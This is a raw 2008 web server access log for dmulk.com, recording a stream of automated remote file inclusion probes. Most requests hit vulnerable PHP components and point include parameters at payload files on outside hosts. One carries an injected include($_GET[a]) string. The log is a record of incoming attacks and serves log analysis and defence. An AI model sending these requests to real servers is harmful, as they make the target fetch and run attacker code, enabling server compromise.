216.70.125.187 - - [06/May/2008:10:11:23 -0700] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [06/May/2008:10:11:24 -0700] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:10:11:33 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:10:11:39 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:10:12:28 -0700] "GET /logs/access_080311.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:10:12:29 -0700] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:10:12:29 -0700] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:12:57 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:12:58 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:12:59 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:13:05 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:13:06 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:13:07 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:13:39 -0700] "GET /logs/access_080215.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:13:41 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:10:13:51 -0700] "GET /index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:33 -0700] "GET /logs/access_080311.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:33 -0700] "GET /logs/access_080311.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:34 -0700] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:34 -0700] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:34 -0700] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:34 -0700] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:37 -0700] "GET /logs/access_080311.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:37 -0700] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:37 -0700] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:41 -0700] "GET /logs/access_080311.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:41 -0700] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:14:42 -0700] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:14:44 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:14:45 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:10:15:29 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:15:29 -0700] "GET /logs//login.php?dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:15:29 -0700] "GET /logs//login.php?dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:15:29 -0700] "GET //login.php?dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:15:29 -0700] "GET //login.php?dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:10:15:29 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:10:15:30 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:15:43 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:10:15:46 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.173 - - [06/May/2008:10:17:05 -0700] "GET /logs/access_071124.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:10:17:29 -0700] "GET /logs/access_080311.log/oneadmin/common/include.php?path[docroot]=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:10:17:30 -0700] "GET /logs/oneadmin/common/include.php?path[docroot]=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:17:47 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:17:53 -0700] "GET /logs/access_080220.log/index1.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.68.17 - - [06/May/2008:10:18:10 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://villeensports.free.fr/html/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:18:14 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:18:14 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:18:15 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:18:21 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:18:21 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:18:21 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:19:05 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:19:06 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:19:06 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:19:12 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:19:13 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:19:14 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:19:32 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:19:33 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:19:33 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:19:39 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:19:39 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:19:40 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:10:19:42 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:10:19:42 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:10:19:43 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:10:19:43 -0700] "GET //index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:10:19:43 -0700] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:10:20:42 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:21:08 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:21:08 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:10:21:19 -0700] "GET /logs/access_080201.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:10:21:19 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:10:21:20 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:22:09 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:14 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:14 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:14 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:17 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:17 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:17 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:19 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:19 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:10:22:19 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:23:22 -0700] "GET /logs/access_071212.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:23:22 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:23:22 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:23:31 -0700] "GET /logs/access_071216.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:23:36 -0700] "GET /logs/access_080112.log//cal//tools/send_reminders.php?includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:23:36 -0700] "GET //cal//tools/send_reminders.php?includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:23:36 -0700] "GET /logs//cal//tools/send_reminders.php?includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:23:37 -0700] "GET /logs/access_080104.log//cal//tools/send_reminders.php?includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:10:23:54 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:10:23:54 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:10:23:59 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:10:24:07 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:10:24:07 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:24:09 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:24:09 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:10:24:11 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:10:24:12 -0700] "GET /logs/access.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:24:17 -0700] "GET /logs/access_071215.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:24:17 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:24:17 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:24:33 -0700] "GET /logs/example.php?site=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:24:33 -0700] "GET /example.php?site=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:24:34 -0700] "GET /logs/access_071211.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:24:56 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:24:57 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
